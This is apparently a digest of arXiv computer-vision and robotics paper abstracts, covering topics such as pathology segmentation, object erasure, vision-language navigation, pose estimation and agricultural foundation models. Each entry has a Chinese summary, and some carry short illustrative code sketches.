类目: Robotics (cs.RO); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Reliable robot perception requires not only predicting scene structure, but also identifying where predictions should be treated as unreliable due to sparse or missing observations. We present ContraMap, a contrastive continuous mapping method that augments kernel-based discriminative maps with an explicit uncertainty class trained using synthetic noise samples. This formulation treats unobserved regions as a contrastive class, enabling joint environment prediction and spatial uncertainty estimation in real time without Bayesian inference. Under a simple mixture-model view, we show that the probability assigned to the uncertainty class is a monotonic function of a distance-aware uncertainty surrogate. Experiments in 2D occupancy mapping, 3D semantic mapping, and tabletop scene reconstruction show that ContraMap preserves mapping quality, produces spatially coherent uncertainty estimates, and is substantially more efficient than Bayesian kernelmap baselines.
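ContraMap 的关键结论是:在混合模型视角下,"不确定类"的概率是距离感知不确定性代理的单调函数。下面的草图用 RBF 核响应近似观测证据,展示查询点越远离观测、不确定类概率越高(核形式与常数 c 均为本文假设的示意,并非论文实现):

```python
import numpy as np

def uncertainty_prob(x, obs, sigma=1.0, c=0.5):
    """混合模型视角下"不确定类"的概率:观测核响应越低,概率越高(示意)。"""
    d2 = np.sum((obs - x) ** 2, axis=1)
    k = np.exp(-d2 / (2 * sigma ** 2)).sum()  # 各观测点贡献的核响应之和
    return c / (c + k)                        # 远离观测 -> k 变小 -> 概率升高

obs = np.array([[0.0, 0.0], [1.0, 0.0]])      # 两个已观测位置
near = uncertainty_prob(np.array([0.5, 0.0]), obs)
far = uncertainty_prob(np.array([5.0, 5.0]), obs)
```

这对应论文中"未观测区域作为对比类"的思想:无需贝叶斯推断即可得到空间一致的不确定性估计。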
[CV-148] Clore: Interactive Pathology Image Segmentation with Click-based Local Refinement
【速读】:该论文旨在解决现有基于深度学习的交互式分割方法在病理图像分割中因依赖迭代全局更新而导致冗余重预测、难以捕捉细粒度结构或修正局部细微误差的问题。其解决方案的关键在于提出了一种基于点击的局部精炼(Click-based Local Refinement, Clore)流程,通过分层交互范式实现高效优化:初始点击用于驱动全局分割快速勾勒大目标区域,后续点击则聚焦于局部细节的逐步精炼,从而在减少交互次数的同时提升边界精度与细粒度分割能力。
链接: https://arxiv.org/abs/2603.27625
作者: Tiantong Wang,Minfan Zhao,Jun Shi,Hannan Wang,Yue Dai
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Recent advancements in deep learning-based interactive segmentation methods have significantly improved pathology image segmentation. Most existing approaches utilize user-provided positive and negative clicks to guide the segmentation process. However, these methods primarily rely on iterative global updates for refinement, which lead to redundant re-prediction and often fail to capture fine-grained structures or correct subtle errors during localized adjustments. To address this limitation, we propose the Click-based Local Refinement (Clore) pipeline, a simple yet efficient method designed to enhance interactive segmentation. The key innovation of Clore lies in its hierarchical interaction paradigm: the initial clicks drive global segmentation to rapidly outline large target regions, while subsequent clicks progressively refine local details to achieve precise boundaries. This approach not only improves the ability to handle fine-grained segmentation tasks but also achieves high-quality results with fewer interactions. Experimental results on four datasets demonstrate that Clore achieves the best balance between segmentation accuracy and interaction cost, making it an effective solution for efficient and accurate interactive pathology image segmentation.
[CV-149] You Only Erase Once: Erasing Anything without Bringing Unexpected Content CVPR2026
【速读】:该论文旨在解决生成式 AI(Generative AI)在图像中目标擦除任务中存在的问题,即现有基于扩散模型的方法由于缺乏足够的成对训练数据和对内容生成的显式约束,常在掩码区域内产生意外内容或伪影,破坏场景上下文的一致性。其解决方案的关键在于:1)利用仅包含大规模真实图像的非配对数据集训练目标擦除扩散模型;2)引入基于实体分割模型构建的杂项检测器(sundries detector)和上下文一致性损失(context coherence loss),以显式约束生成内容并保持周围环境的语义连贯性;3)采用扩散蒸馏策略训练少步数的擦除扩散模型,提升训练与推理效率。
链接: https://arxiv.org/abs/2603.27599
作者: Yixing Zhu,Qing Zhang,Wenju Xu,Wei-Shi Zheng
机构: Sun Yat-sen University (中山大学); Amazon; Stanford University (斯坦福大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted by CVPR2026
Abstract:We present YOEO, an approach for object erasure. Unlike recent diffusion-based methods which struggle to erase target objects without generating unexpected content within the masked regions due to lack of sufficient paired training data and explicit constraint on content generation, our method allows to produce high-quality object erasure results free of unwanted objects or artifacts while faithfully preserving the overall context coherence to the surrounding content. We achieve this goal by training an object erasure diffusion model on unpaired data containing only large-scale real-world images, under the supervision of a sundries detector and a context coherence loss that are built upon an entity segmentation model. To enable more efficient training and inference, a diffusion distillation strategy is employed to train for a few-step erasure diffusion model. Extensive experiments show that our method outperforms the state-of-the-art object erasure methods. Code will be available at this https URL.
[CV-150] STRIDE: When to Speak Meets Sequence Denoising for Streaming Video Understanding
【速读】:该论文旨在解决视频大语言模型(Video-LLM)在在线流式视频场景中缺乏主动激活机制的问题,即系统不仅需要判断何时响应,还需在连续到来的视频帧中实现时序一致且可靠的“何时说话”(when-to-speak)决策。解决方案的关键在于将主动激活建模为一种结构化序列建模问题,利用视频流中自然形成的跨度结构(span-structured activation patterns),通过一个轻量级掩码扩散模块(masked diffusion module)在滑动时间窗口内联合预测并迭代优化激活信号,从而提升响应的时序连贯性和可靠性。该方法被命名为STRIDE(Structured Temporal Refinement with Iterative DEnoising),在多个流式基准和下游模型上验证了其优越性。
链接: https://arxiv.org/abs/2603.27593
作者: Junho Kim,Hosu Lee,James M. Rehg,Minsu Kim,Yong Man Ro
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: Project page: this https URL
Abstract:Recent progress in video large language models (Video-LLMs) has enabled strong offline reasoning over long and complex videos. However, real-world deployments increasingly require streaming perception and proactive interaction, where video frames arrive online and the system must decide not only what to respond, but also when to respond. In this work, we revisit proactive activation in streaming video as a structured sequence modeling problem, motivated by the observation that temporal transitions in streaming video naturally form span-structured activation patterns. To capture this span-level structure, we model activation signals jointly over a sliding temporal window and update them iteratively as new frames arrive. We propose STRIDE (Structured Temporal Refinement with Iterative DEnoising), which employs a lightweight masked diffusion module at the activation interface to jointly predict and progressively refine activation signals across the window. Extensive experiments on diverse streaming benchmarks and downstream models demonstrate that STRIDE shows more reliable and temporally coherent proactive responses, significantly improving when-to-speak decision quality in online streaming scenarios.
[CV-151] A Robust Low-Rank Prior Model for Structured Cartoon-Texture Image Decomposition with Heavy-Tailed Noise
【速读】:该论文旨在解决图像处理中卡通-纹理分解(cartoon-texture image decomposition)问题,尤其是在存在重尾噪声(heavy-tailed noise)时难以获得鲁棒分解结果的挑战。其解决方案的关键在于提出一种基于鲁棒低秩先验(robust low-rank prior)的模型:采用Huber损失函数作为数据保真项替代传统的ℓ₂-范数,以更好地适应重尾噪声分布;同时保留总变差(total variation, TV)和核范数(nuclear norm)分别用于刻画图像的光滑卡通成分与纹理成分。此外,作者设计了两种可实施的算子分裂算法,适配不同退化算子,从而在高强度重尾噪声下的图像恢复任务中展现出优越性能。
链接: https://arxiv.org/abs/2603.27579
作者: Weihao Tang,Hongjin He
机构: Ningbo University (宁波大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Optimization and Control (math.OC)
备注: This paper introduces a robust model for cartoon-texture image decomposition with heavy-tailed noise. It has 11 figures and 4 tables
Abstract:Cartoon-texture image decomposition is a fundamental yet challenging problem in image processing. A significant hurdle in achieving accurate decomposition is the pervasive presence of noise in the observed images, which severely impedes robust results. To address the challenging problem of cartoon-texture decomposition in the presence of heavy-tailed noise, in this paper we propose a robust low-rank prior model. Our approach departs from conventional models by adopting the Huber loss function as the data-fidelity term, rather than the traditional \ell_2-norm, while retaining the total variation norm and nuclear norm to characterize the cartoon and texture components, respectively. Given the inherent structure, we employ two implementable operator splitting algorithms, tailored to different degradation operators. Extensive numerical experiments, particularly on image restoration tasks under high-intensity heavy-tailed noise, clearly demonstrate the superior performance of our model.
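可以用几行 NumPy 直观对比 Huber 损失与 ℓ2 损失对重尾离群残差的响应(笔者补充的示意;δ=1 为假设取值,与论文的实际设定无关):

```python
import numpy as np

def huber(r, delta=1.0):
    """Huber data-fidelity term: quadratic for small residuals, linear
    beyond delta, so heavy-tailed outliers are downweighted vs. ell_2."""
    a = np.abs(r)
    return np.where(a <= delta, 0.5 * r**2, delta * (a - 0.5 * delta))

residuals = np.array([0.1, -0.5, 8.0])   # last entry mimics a heavy-tailed outlier
print(huber(residuals))                  # Huber cost per residual
print(0.5 * residuals**2)                # ell_2 cost for comparison
```

对大残差(8.0),Huber 代价为 7.5,呈线性增长;而 ℓ2 代价为 32,呈二次增长。以 Huber 作数据保真项因此能显著降低重尾噪声对分解结果的影响。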
[CV-152] Structured Observation Language for Efficient and Generalizable Vision-Language Navigation
【速读】:该论文旨在解决视觉-语言导航(Vision-Language Navigation, VLN)任务中因视觉与语言模态融合不充分而导致的模型对环境变化敏感、泛化能力差的问题。现有方法通常依赖大规模视觉预训练将原始图像转化为视觉标记或隐式特征,导致模型在光照、纹理等环境变化下性能下降。其解决方案的关键在于提出SOL-Nav框架,该框架通过将第一人称RGB-D图像划分为N×N网格,并提取每个网格单元的语义、颜色和深度信息生成结构化的语言描述,再与自然语言指令拼接作为纯文本输入至预训练语言模型(Pre-trained Language Model, PLM),从而实现高效且可泛化的导航决策,显著降低模型规模和训练数据依赖,同时充分发挥PLM的推理与表征能力。
链接: https://arxiv.org/abs/2603.27577
作者: Daojie Peng,Fulong Ma,Jun Ma
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Robotics (cs.RO)
备注:
Abstract:Vision-Language Navigation (VLN) requires an embodied agent to navigate complex environments by following natural language instructions, which typically demands tight fusion of visual and language modalities. Existing VLN methods often convert raw images into visual tokens or implicit features, requiring large-scale visual pre-training and suffering from poor generalization under environmental variations (e.g., lighting, texture). To address these issues, we propose SOL-Nav (Structured Observation Language for Navigation), a novel framework that translates egocentric visual observations into compact structured language descriptions for efficient and generalizable navigation. Specifically, we divide RGB-D images into an N×N grid, extract representative semantic, color, and depth information for each grid cell to form structured text, and concatenate this with the language instruction as pure language input to a pre-trained language model (PLM). Experimental results on standard VLN benchmarks (R2R, RxR) and real-world deployments demonstrate that SOL-Nav significantly reduces the model size and training data dependency, fully leverages the reasoning and representation capabilities of PLMs, and achieves strong generalization to unseen environments.
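SOL-Nav 将网格化观测转写为结构化文本的过程,可用如下玩具函数示意(笔者补充;单元格的描述模板为假设格式,摘要并未给出论文的实际模板):

```python
def cells_to_text(grid):
    """Serialise an N x N grid of per-cell observations into a
    structured language description (toy format; the paper's exact
    template is not specified in the abstract)."""
    lines = []
    for i, row in enumerate(grid):
        for j, (label, color, depth) in enumerate(row):
            lines.append(f"cell({i},{j}): {color} {label}, depth {depth:.1f}m")
    return "; ".join(lines)

grid = [
    [("door", "white", 2.5), ("wall", "gray", 3.0)],
    [("floor", "brown", 1.0), ("chair", "red", 1.8)],
]
desc = cells_to_text(grid)
print(desc)
```

生成的纯文本描述可直接与指令拼接后输入 PLM,完全绕开视觉 token 化,这正是该方法对光照、纹理变化不敏感的原因。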
[CV-153] Learning to See through Illumination Extremes with Event Streaming in Multimodal Large Language Models CVPR
【速读】:该论文旨在解决多模态大语言模型(Multimodal Large Language Models, MLLMs)在极端光照条件下视觉-语言推理性能显著下降的问题,此时RGB输入因曝光过度或不足而丢失结构与语义信息。解决方案的核心在于提出Event-MLLM,通过动态融合事件流(event stream)与RGB帧实现全光照环境下的视觉推理能力;其关键创新包括:(1) 光照指示器(Illumination Indicator)——基于DINOv2分支学习得到的可训练信号,用于表征曝光退化程度并自适应调节事件与RGB特征的融合权重;(2) 光照校正损失(Illumination Correction Loss)——在潜在空间中对齐融合特征与正常光照下的语义表示,以补偿极端光照下丢失的信息。
链接: https://arxiv.org/abs/2603.27558
作者: Baoheng Zhang,Jiahui Liu,Gui Zhao,Weizhou Zhang,Yixuan Ma,Jun Jiang,Yingxian Chen,Wilton W.T. Fok,Xiaojuan Qi,Hayden Kwok-Hay So
机构: The University of Hong Kong (香港大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR) 2026
Abstract:Multimodal Large Language Models (MLLMs) perform strong vision-language reasoning under standard conditions but fail in extreme illumination, where RGB inputs irrecoverably lose structure and semantics. We propose Event-MLLM, an event-enhanced model that performs all-light visual reasoning by dynamically fusing event streams with RGB frames. Two key components drive our approach: an Illumination Indicator - a learnable signal derived from a DINOv2 branch that represents exposure degradation and adaptively modulates event-RGB fusion - and an Illumination Correction Loss that aligns fused features with non-degraded (normal-light) semantics in the latent space, compensating for information lost in extreme lighting. We curate the first multi-illumination event-instruction corpus for MLLMs, with 2,241 event-RGB samples (around 6 QA pairs each) across diverse scenes and 17 brightness rates (0.05x - 20x), plus an instruction-following benchmark for reasoning, counting, and fine-grained recognition under extreme lighting. Experiments show that Event-MLLM markedly outperforms general-purpose, illumination-adaptive, and event-only baselines, setting a new state of the art in robust multimodal perception and reasoning under challenging illumination.
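其中"光照指示器自适应调制事件-RGB 融合"的思想可用如下简化代码表达(笔者补充;真实的指示器由 DINOv2 分支学习得到,这里以标量 degradation∈[0,1] 代替):

```python
import numpy as np

def fuse(rgb_feat, event_feat, degradation):
    """Illumination-indicator style fusion (sketch): the more the RGB
    input is over/under-exposed, the more weight the event features get.
    `degradation` in [0, 1] stands in for the learned indicator."""
    g = np.clip(degradation, 0.0, 1.0)
    return g * event_feat + (1.0 - g) * rgb_feat

rgb = np.ones(4) * 0.2
event = np.ones(4) * 0.8
print(fuse(rgb, event, 0.0))   # normal light: pure RGB features
print(fuse(rgb, event, 1.0))   # extreme light: pure event features
```

正常光照下(degradation≈0)输出退化为 RGB 特征,极端光照下(degradation≈1)则完全依赖事件特征,中间情形按曝光退化程度连续插值。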
[CV-154] Towards Domain-Generalized Open-Vocabulary Object Detection: A Progressive Domain-invariant Cross-modal Alignment Method
【速读】:该论文旨在解决开放词汇目标检测(Open-Vocabulary Object Detection, OVOD)在分布偏移(distribution shift)场景下性能退化的问题,特别是揭示了视觉流形与文本嵌入之间脆弱耦合导致的跨域泛化能力不足。其核心贡献在于提出了一种渐进式域不变跨模态对齐方法(Progressive Domain-invariant Cross-modal Alignment, PICA),关键创新点在于引入多层级模糊性和信号强度课程学习机制,通过自适应构建伪词原型并结合样本置信度与视觉一致性进行迭代优化,从而增强跨域条件下视觉与语义空间的稳定对齐,提升OVOD系统在非静态环境中的鲁棒性。
链接: https://arxiv.org/abs/2603.27556
作者: Xiaoran Xu,Xiaoshan Yang,Jiangang Yang,Yifan Xu,Jian Liu,Changsheng Xu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Open-Vocabulary Object Detection (OVOD) has achieved remarkable success in generalizing to novel categories. However, this success often rests on the implicit assumption of domain stationarity. In this work, we provide a principled revisit of the OVOD paradigm, uncovering a fundamental vulnerability: the fragile coupling between visual manifolds and textual embeddings when distribution shifts occur. We first systematically formalize Domain-Generalized Open-Vocabulary Object Detection (DG-OVOD). Through empirical analysis, we demonstrate that visual shifts do not merely add noise; they cause a collapse of the latent cross-modal space where novel category visual signals detach from their semantic anchors. Motivated by these insights, we propose Progressive Domain-invariant Cross-modal Alignment (PICA). PICA departs from uniform training by introducing a multi-level ambiguity and signal strength curriculum. It builds adaptive pseudo-word prototypes, refined via sample confidence and visual consistency, to enforce invariant cross-domain modality alignment. Our findings suggest that OVOD’s robustness to domain shifts is intrinsically linked to the stability of the latent cross-modal alignment space. Our work provides both a challenging benchmark and a new perspective on building truly generalizable open-vocabulary systems that extend beyond static laboratory conditions.
[CV-155] PANDORA: Pixel-wise Attention Dissolution and Latent Guidance for Zero-Shot Object Removal ICME2026
【速读】:该论文旨在解决自然图像中对象移除(object removal)的挑战,即在保持背景完整性的同时合成语义一致的内容,现有方法常依赖微调、提示工程或推理时优化,但仍存在纹理不一致、刚性伪影、前景与背景解耦能力弱及多对象移除扩展性差等问题。其解决方案的关键在于提出一种零样本(zero-shot)框架PANDORA,直接作用于预训练文本到图像扩散模型,无需微调、提示或优化;核心创新包括Pixel-wise Attention Dissolution(像素级注意力消解),通过抑制掩码像素最相关的注意力键来中断自注意力流,使背景上下文主导重建;以及Localized Attentional Disentanglement Guidance(局部注意力解耦引导),引导去噪过程朝向有利于干净对象移除的潜在流形发展,从而实现精确、非刚性、免提示且单次通过即可完成的多对象擦除。
链接: https://arxiv.org/abs/2603.27555
作者: Dinh-Khoi Vo,Van-Loc Nguyen,Tam V. Nguyen,Minh-Triet Tran,Trung-Nghia Le
机构: University of Science, Ho Chi Minh City, Vietnam (胡志明市科学大学); Vietnam National University, Ho Chi Minh City, Vietnam (胡志明市国立大学); University of Dayton, Ohio, United States (代顿大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: ICME 2026
Abstract:Removing objects from natural images is challenging due to the difficulty of synthesizing semantically coherent content while preserving background integrity. Existing methods often rely on fine-tuning, prompt engineering, or inference-time optimization, yet still suffer from texture inconsistency, rigid artifacts, weak foreground-background disentanglement, and poor scalability for multi-object removal. We propose a novel zero-shot object removal framework, namely PANDORA, that operates directly on pre-trained text-to-image diffusion models, requiring no fine-tuning, prompts, or optimization. We propose Pixel-wise Attention Dissolution to remove objects by nullifying the most correlated attention keys for masked pixels, effectively eliminating the object from the self-attention flow and allowing background context to dominate reconstruction. We further introduce Localized Attentional Disentanglement Guidance to steer denoising toward latent manifolds favorable to clean object removal. Together, these components enable precise, non-rigid, prompt-free, and scalable multi-object erasure in a single pass. Experiments demonstrate superior visual fidelity and semantic plausibility compared to state-of-the-art methods. The project page is available at this https URL.
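其核心操作"像素级注意力消解"——对被掩码的查询像素抑制其最相关的注意力键——可用如下单头点积注意力的玩具实现示意(笔者补充;真实方法作用于预训练扩散模型的自注意力层,此处仅演示抑制与重归一化这一步):

```python
import numpy as np

def dissolve_attention(q, k, mask, topk=1):
    """Pixel-wise attention dissolution (sketch): for each masked query,
    suppress its most correlated keys before softmax, so the remaining
    (background) keys dominate the attention distribution."""
    logits = q @ k.T                             # (n, n) attention logits
    for i in np.where(mask)[0]:
        drop = np.argsort(logits[i])[-topk:]     # most correlated keys
        logits[i, drop] = -np.inf                # nullify them
    e = np.exp(logits - logits.max(axis=1, keepdims=True))
    return e / e.sum(axis=1, keepdims=True)

q = k = np.eye(3)                                # toy queries/keys
mask = np.array([True, False, False])            # pixel 0 lies in the object mask
attn = dissolve_attention(q, k, mask)
print(np.round(attn, 2))
```

示例中被掩码的第 0 个查询对自身(最相关键)的注意力被置零,其权重被重新分配到其余(背景)键上,未掩码的查询则不受影响。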
[CV-156] Annotation-Free Detection of Drivable Areas and Curbs Leveraging LiDAR Point Cloud Maps
【速读】:该论文旨在解决自动驾驶中可行驶区域(drivable area)与路缘(curb)检测任务依赖大规模人工标注数据的问题,此类数据获取成本高、效率低且受限于专家资源,制约了深度神经网络(Deep Neural Networks, DNNs)在真实场景中的应用。其解决方案的关键在于提出一种基于地图的自动数据标注模块(Map-based Automatic Data Labeler, MADL),该模块融合LiDAR建图与定位信息,结合路缘检测能力,实现对可行驶区域和路缘的自动化标注,有效规避了单帧LiDAR点云稀疏性和遮挡问题,从而生成高质量、大规模的训练数据集;同时引入数据审查代理(data review agent)进一步过滤低质量样本,显著提升标注数据的准确性与鲁棒性。
链接: https://arxiv.org/abs/2603.27553
作者: Fulong Ma,Daojie Peng,Jun Ma
机构: The Hong Kong University of Science and Technology (Guangzhou) (香港科技大学(广州))
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Drivable areas and curbs are critical traffic elements for autonomous driving, forming essential components of the vehicle visual perception system and ensuring driving safety. Deep neural networks (DNNs) have significantly improved perception performance for drivable area and curb detection, but most DNN-based methods rely on large manually labeled datasets, which are costly, time-consuming, and expert-dependent, limiting their real-world application. Thus, we developed an automated training data generation module. Our previous work generated training labels using single-frame LiDAR and RGB data, suffering from occlusion and distant point cloud sparsity. In this paper, we propose a novel map-based automatic data labeler (MADL) module, combining LiDAR mapping/localization with curb detection to automatically generate training data for both tasks. MADL avoids occlusion and point cloud sparsity issues via LiDAR mapping, creating accurate large-scale datasets for DNN training. In addition, we construct a data review agent to filter the data generated by the MADL module, eliminating low-quality samples. Experiments on the KITTI, KITTI-CARLA and 3D-Curb datasets show that MADL achieves impressive performance compared to manual labeling, and outperforms traditional and state-of-the-art self-supervised methods in robustness and accuracy.
[CV-157] MV-RoMa: From Pairwise Matching into Multi-View Track Reconstruction CVPR2026
【速读】:该论文旨在解决多视图三维视觉任务中,现有匹配方法多以成对方式操作导致轨迹碎片化和几何不一致的问题。其核心挑战在于如何在多个共视图像之间建立稠密且几何一致的对应关系,从而提升结构从运动(SfM)等任务的重建质量。解决方案的关键在于提出MV-RoMa模型:首先设计了一个多视图编码器,利用成对匹配结果作为几何先验来降低计算复杂度;其次引入一个多视图匹配精炼模块,通过像素级注意力机制优化对应关系;最后结合后处理策略将一致的多视图对应关系整合为高质量轨迹用于SfM重建,显著提升了重建密度与准确性。
链接: https://arxiv.org/abs/2603.27542
作者: Jongmin Lee,Seungyeop Kang,Sungjoo Yoo
机构: KAIST; Seoul National University
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: CVPR 2026 Accepted
Abstract:Establishing consistent correspondences across images is essential for 3D vision tasks such as structure-from-motion (SfM), yet most existing matchers operate in a pairwise manner, often producing fragmented and geometrically inconsistent tracks when their predictions are chained across views. We propose MV-RoMa, a multi-view dense matching model that jointly estimates dense correspondences from a source image to multiple co-visible targets. Specifically, we design an efficient model architecture which avoids high computational cost of full cross-attention for multi-view feature interaction: (i) multi-view encoder that leverages pair-wise matching results as a geometric prior, and (ii) multi-view matching refiner that refines correspondences using pixel-wise attention. Additionally, we propose a post-processing strategy that integrates our model’s consistent multi-view correspondences as high-quality tracks for SfM. Across diverse and challenging benchmarks, MV-RoMa produces more reliable correspondences and substantially denser, more accurate 3D reconstructions than existing sparse and dense matching methods. Project page: this https URL.
[CV-158] Demo-Pose: Depth-Monocular Modality Fusion For Object Pose Estimation ICASSP2026
【速读】:该论文旨在解决类别级9自由度(9-DoF)姿态估计问题,即从RGB-D输入中同时预测物体的6D姿态(3D位置和3D旋转)与3D尺寸,且在推理阶段无需依赖CAD模型。现有方法存在两大局限:纯深度方法忽略RGB语义信息,而多数RGB-D融合模型因跨模态融合策略不佳,未能有效对齐RGB语义特征与3D几何表示。其解决方案的关键在于提出一种混合架构DeMo-Pose,通过一种新颖的多模态融合策略,将单目语义特征与基于深度图的图卷积表示进行深度融合;此外,引入Mesh-Point Loss(MPL),利用网格结构在训练阶段增强几何感知能力,且不增加推理开销。该方法在REAL275基准上显著优于当前最优方法GPV-Pose,在3D IoU上提升3.2%,姿态精度提升11.1%。
链接: https://arxiv.org/abs/2603.27533
作者: Rachit Agarwal,Abhishek Joshi,Sathish Chalasani,Woo Jin Kim
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: Accepted at ICASSP 2026, 5 pages, 3 figures, 3 tables
Abstract:Object pose estimation is a fundamental task in 3D vision with applications in robotics, AR/VR, and scene understanding. We address the challenge of category-level 9-DoF pose estimation (6D pose + 3D size) from RGB-D input, without relying on CAD models during inference. Existing depth-only methods achieve strong results but ignore semantic cues from RGB, while many RGB-D fusion models underperform due to suboptimal cross-modal fusion that fails to align semantic RGB cues with 3D geometric representations. We propose DeMo-Pose, a hybrid architecture that fuses monocular semantic features with depth-based graph convolutional representations via a novel multimodal fusion strategy. To further improve geometric reasoning, we introduce a novel Mesh-Point Loss (MPL) that leverages mesh structure during training without adding inference overhead. Our approach achieves real-time inference and significantly improves over state-of-the-art methods across object categories, outperforming the strong GPV-Pose baseline by 3.2% on 3D IoU and 11.1% on pose accuracy on the REAL275 benchmark. The results highlight the effectiveness of depth-RGB fusion and geometry-aware learning, enabling robust category-level 3D pose estimation for real-world applications.
[CV-159] OmniColor: A Unified Framework for Multi-modal Lineart Colorization
【速读】:该论文旨在解决线稿上色(lineart colorization)在多样化用户约束下难以实现精确且灵活控制的问题。其核心挑战在于如何统一处理多种模态的引导信号(guidance signals),并确保颜色恢复的边界保真度与时间稳定性。解决方案的关键在于提出OmniColor框架,通过系统性地将引导信号分为空间对齐条件(spatially-aligned conditions)和语义参考条件(semantic-reference conditions),分别采用双路径编码结合密集特征对齐损失(Dense Feature Alignment loss)以强化边界保持,以及基于视觉语言模型(VLM-only)的编码与时间冗余消除机制(Temporal Redundancy Elimination)提升推理效率;同时引入自适应空间-语义门控模块(Adaptive Spatial-Semantic Gating module)动态平衡多模态约束,从而实现高可控性、高质量和时序稳定的线稿上色效果。
链接: https://arxiv.org/abs/2603.27531
作者: Xulu Zhang,Haoqian Du,Xiaoyong Wei,Qing Li
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Lineart colorization is a critical stage in professional content creation, yet achieving precise and flexible results under diverse user constraints remains a significant challenge. To address this, we propose OmniColor, a unified framework for multi-modal lineart colorization that supports arbitrary combinations of control signals. Specifically, we systematically categorize guidance signals into two types: spatially-aligned conditions and semantic-reference conditions. For spatially-aligned inputs, we employ a dual-path encoding strategy paired with a Dense Feature Alignment loss to ensure rigorous boundary preservation and precise color restoration. For semantic-reference inputs, we utilize a VLM-only encoding scheme integrated with a Temporal Redundancy Elimination mechanism to filter repetitive information and enhance inference efficiency. To resolve potential input conflicts, we introduce an Adaptive Spatial-Semantic Gating module that dynamically balances multi-modal constraints. Experimental results demonstrate that OmniColor achieves superior controllability, visual quality, and temporal stability, providing a robust and practical solution for lineart colorization. The source code and dataset will be open at this https URL.
[CV-160] TokenDial: Continuous Attribute Control in Text-to-Video via Spatiotemporal Token Offsets
【速读】:该论文旨在解决预训练文本到视频生成模型在属性控制方面的局限性问题,即现有方法难以实现对属性变化程度(如效果强度或运动幅度)的连续、精确调控,同时保持视频身份、背景和时序一致性的稳定性。解决方案的关键在于提出TokenDial框架,其核心创新是利用中间时空视觉补丁标记(spatiotemporal visual patch-token)空间中的加性偏移量作为语义控制方向,通过调整偏移量的幅度可实现外观与运动动态的连贯且可预测的编辑,且无需重新训练主干模型;具体实现上,借助预训练模型中的理解信号——外观属性采用语义方向匹配,运动属性则通过运动幅度缩放进行建模,从而实现了高效、高保真的属性连续控制。
链接: https://arxiv.org/abs/2603.27520
作者: Zhixuan Liu,Peter Schaldenbrand,Yijun Li,Long Mai,Aniruddha Mahapatra,Cusuh Ham,Jean Oh,Jui-Hsien Wang
机构: Adobe Research(Adobe研究院); Carnegie Mellon University(卡内基梅隆大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Project page: this https URL
Abstract:We present TokenDial, a framework for continuous, slider-style attribute control in pretrained text-to-video generation models. While modern generators produce strong holistic videos, they offer limited control over how much an attribute changes (e.g., effect intensity or motion magnitude) without drifting identity, background, or temporal coherence. TokenDial is built on the observation: additive offsets in the intermediate spatiotemporal visual patch-token space form a semantic control direction, where adjusting the offset magnitude yields coherent, predictable edits for both appearance and motion dynamics. We learn attribute-specific token offsets without retraining the backbone, using pretrained understanding signals: semantic direction matching for appearance and motion-magnitude scaling for motion. We demonstrate TokenDial’s effectiveness on diverse attributes and prompts, achieving stronger controllability and higher-quality edits than state-of-the-art baselines, supported by extensive quantitative evaluation and human studies.
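其核心观察——在中间 patch-token 空间沿某个语义方向施加可缩放的加性偏移——可用如下玩具代码示意(笔者补充;真实的属性方向是针对具体属性学习得到的,这里的 direction 为假设数值):

```python
import numpy as np

def apply_offset(tokens, direction, alpha):
    """Slider-style control (sketch): add a learned offset direction to
    the intermediate patch tokens, scaled by a user-chosen magnitude."""
    d = direction / np.linalg.norm(direction)   # unit semantic direction
    return tokens + alpha * d

tokens = np.zeros((4, 3))               # 4 patch tokens, dim 3 (toy)
direction = np.array([3.0, 0.0, 4.0])   # hypothetical attribute direction
edited = apply_offset(tokens, direction, alpha=2.0)
print(edited[0])
```

调大 alpha 即相当于拨动"滑杆":所有 token 沿同一语义方向平移,编辑方向一致、幅度连续可控,而主干模型无需任何重训练。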
[CV-161] SPROUT: A Scalable Diffusion Foundation Model for Agricultural Vision
【速读】:该论文旨在解决视觉基础模型(Vision Foundation Models, VFM)在农业场景中因域差距(domain gap)导致性能显著下降的问题。现有VFM通常在大规模无标签通用图像数据上预训练,但在农业任务中表现不佳,主要受限于作物多样性、生长阶段差异及环境复杂性等因素。解决方案的关键在于提出一种名为SPROUT(Scalable Plant Representation model via Open-field Unsupervised Training)的多作物、多任务农业基础模型,其核心创新是采用无VAE(Variational Autoencoder)的像素空间扩散Transformer(Pixel-space Diffusion Transformer)进行去噪训练,从而学习结构感知的植物表征,并支持高效端到端训练。该方法在包含260万张高质量农业图像的数据集上预训练,显著提升了下游农业任务的泛化能力,同时大幅降低预训练成本。
链接: https://arxiv.org/abs/2603.27519
作者: Shuai Xiang,Wei Guo,James Burridge,Shouyang Liu,Hao Lu,Tokihiro Fukatsu
机构: The University of Tokyo (东京大学); Nanjing Agricultural University (南京农业大学); Huazhong University of Science and Technology (华中科技大学); NARO (日本农业研究机构); University of Tsukuba (筑波大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Vision Foundation Models (VFM) pre-trained on large-scale unlabeled data have achieved remarkable success on general computer vision tasks, yet typically suffer from significant domain gaps when applied to agriculture. In this context, we introduce SPROUT (Scalable Plant Representation model via Open-field Unsupervised Training), a multi-crop, multi-task agricultural foundation model trained via diffusion denoising. SPROUT leverages a VAE-free Pixel-space Diffusion Transformer to learn rich, structure-aware representations through denoising while enabling efficient end-to-end training. We pre-train SPROUT on a curated dataset of 2.6 million high-quality agricultural images spanning diverse crops, growth stages, and environments. Extensive experiments demonstrate that SPROUT consistently outperforms state-of-the-art web-pretrained and agricultural foundation models across a wide range of downstream tasks, while requiring substantially lower pre-training cost. The code and model are available at this https URL.
